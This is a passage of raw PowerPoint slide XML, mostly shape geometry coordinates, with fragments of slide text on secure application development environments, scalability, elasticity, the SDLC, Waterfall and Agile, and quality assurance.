                    <a:pt x="203341" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158147" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137678" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118627" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100995" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84781" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69985" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56607" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44647" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34104" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24980" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17273" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10983" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6641" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11689" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18153" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26034" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35332" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46046" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58176" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71723" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86686" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103064" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120859" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140070" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160696" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182739" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206196" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231070" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257358" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285062" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="EE636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416040" y="5783580"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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6704838" y="5972302"/>
            <a:ext cx="1847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25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98142" y="5517286"/>
            <a:ext cx="4236085" cy="1173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1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Scalability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means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that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the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costs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v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lved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pp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yi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7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ser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v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ice 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more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users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linear.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478769" y="5580743"/>
            <a:ext cx="4026535" cy="1174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065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pP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Elasticity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refers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3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system's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ability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handle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changes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on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 demand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real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time.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55992" y="5369052"/>
            <a:ext cx="1543811" cy="1543812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5729" y="306451"/>
            <a:ext cx="83870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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environments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0300" y="760476"/>
            <a:ext cx="11446764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38350" y="1882292"/>
            <a:ext cx="12578715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272280" marR="5080" indent="-4260215">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Software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Development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Life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Cycle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(SDLC)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divides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creation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maintenance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software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into </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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discrete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phases.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These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include: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734502" y="4380166"/>
            <a:ext cx="2969895" cy="2921635"/>
            <a:chOff x="1734502" y="4380166"/>
            <a:chExt cx="2969895" cy="2921635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1748789" y="4394453"/>
              <a:ext cx="2941320" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2941320" h="2893059">
                  <a:moveTo>
                    <a:pt x="2750058" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191262" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147397" y="5049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107135" y="19434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71623" y="42007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42007" y="71623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19434" y="107135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5049" y="147397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="191262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2701290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5049" y="2745154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19434" y="2785416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42007" y="2820928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71623" y="2850544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107135" y="2873117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147397" y="2887502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191262" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750058" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793922" y="2887502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834184" y="2873117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869696" y="2850544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899312" y="2820928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921885" y="2785416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2936270" y="2745154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941320" y="2701290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941320" y="191262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2936270" y="147397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921885" y="107135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899312" y="71623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869696" y="42007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834184" y="19434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793922" y="5049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750058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748789" y="4394453"/>
              <a:ext cx="2941320" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2941320" h="2893059">
                  <a:moveTo>
                    <a:pt x="0" y="191262"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5049" y="147397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19434" y="107135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42007" y="71623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71623" y="42007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107135" y="19434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147397" y="5049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191262" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750058" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793922" y="5049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834184" y="19434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869696" y="42007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899312" y="71623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921885" y="107135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2936270" y="147397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941320" y="191262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941320" y="2701290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2936270" y="2745154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921885" y="2785416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899312" y="2820928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869696" y="2850544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834184" y="2873117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793922" y="2887502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750058" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191262" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147397" y="2887502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107135" y="2873117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71623" y="2850544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42007" y="2820928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19434" y="2785416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5049" y="2745154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2701290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="191262"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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006345" y="5023002"/>
            <a:ext cx="2473960" cy="15563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6555" marR="5080" indent="-364490">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Waterfall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4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Agile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development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two</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="192405">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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principal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SDLCs.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48027" y="3459479"/>
            <a:ext cx="2944495" cy="1117600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2944495" h="1117600">
                <a:moveTo>
                  <a:pt x="2758186" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="186182" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="186182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="930910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186182" y="1117092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758186" y="1117092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807696" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852175" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2889853" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2918958" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2937720" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2944368" y="930910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2944368" y="186182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2937720" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2918958" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2889853" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852175" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807696" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758186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889885" y="3838194"/>
            <a:ext cx="66040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14" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SDLC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904422" y="4337494"/>
            <a:ext cx="2973070" cy="2921635"/>
            <a:chOff x="4904422" y="4337494"/>
            <a:chExt cx="2973070" cy="2921635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4918709" y="4351782"/>
              <a:ext cx="2944495" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2944495" h="2893059">
                  <a:moveTo>
                    <a:pt x="2694940" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="249427" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204615" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162429" y="15614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123575" y="34073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88760" y="58691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58691" y="88760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34073" y="123575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15614" y="162429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="204615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="249427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2643123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="2687936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15614" y="2730122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34073" y="2768976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58691" y="2803791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88760" y="2833860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123575" y="2858478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162429" y="2876937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204615" y="2888530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249427" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2694940" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739752" y="2888530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781938" y="2876937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820792" y="2858478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855607" y="2833860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2885676" y="2803791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2910294" y="2768976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2928753" y="2730122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940346" y="2687936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944367" y="2643123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944367" y="249427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940346" y="204615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2928753" y="162429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2910294" y="123575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2885676" y="88760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855607" y="58691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820792" y="34073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781938" y="15614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739752" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2694940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918709" y="4351782"/>
              <a:ext cx="2944495" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2944495" h="2893059">
                  <a:moveTo>
                    <a:pt x="0" y="249427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4021" y="204615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15614" y="162429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34073" y="123575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58691" y="88760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88760" y="58691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123575" y="34073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162429" y="15614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204615" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249427" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2694940" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739752" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781938" y="15614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820792" y="34073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855607" y="58691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2885676" y="88760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2910294" y="123575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2928753" y="162429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940346" y="204615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944367" y="249427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944367" y="2643123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940346" y="2687936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2928753" y="2730122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2910294" y="2768976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2885676" y="2803791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855607" y="2833860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820792" y="2858478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781938" y="2876937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739752" y="2888530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2694940" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249427" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204615" y="2888530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162429" y="2876937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123575" y="2858478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88760" y="2833860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58691" y="2803791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34073" y="2768976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15614" y="2730122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="2687936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2643123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="249427"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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5127497" y="4981449"/>
            <a:ext cx="2574925" cy="15557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3810">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Quality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assurance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ref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how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an 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gan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za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ti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st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a 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system.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917947" y="3416808"/>
            <a:ext cx="2944495" cy="1117600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2944495" h="1117600">
                <a:moveTo>
                  <a:pt x="2758185" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="186181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="186181"/>
